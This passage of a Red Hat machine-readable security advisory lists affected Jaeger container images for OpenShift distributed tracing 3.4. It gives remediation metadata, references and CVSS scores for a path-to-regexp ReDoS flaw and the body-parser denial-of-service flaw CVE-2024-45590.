"NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "path-to-regexp: Backtracking regular expressions cause ReDoS" }, { "cve": "CVE-2024-45590", "cwe": { "id": "CWE-405", "name": "Asymmetric Resource Consumption (Amplification)" }, "discovery_date": "2024-09-10T16:20:29.292154+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2311171" } ], "notes": [ { "category": "description", "text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", "title": "Vulnerability description" }, { "category": "summary", "text": "body-parser: Denial of Service Vulnerability in body-parser", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-45590" }, { "category": "external", "summary": "RHBZ#2311171", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590", "url": "https://www.cve.org/CVERecord?id=CVE-2024-45590" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590" }, { "category": "external", "summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", "url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce" }, { "category": "external", "summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", "url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7" } ], "release_date": "2024-09-10T16:15:21.083000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-10T11:04:35+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10917" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": 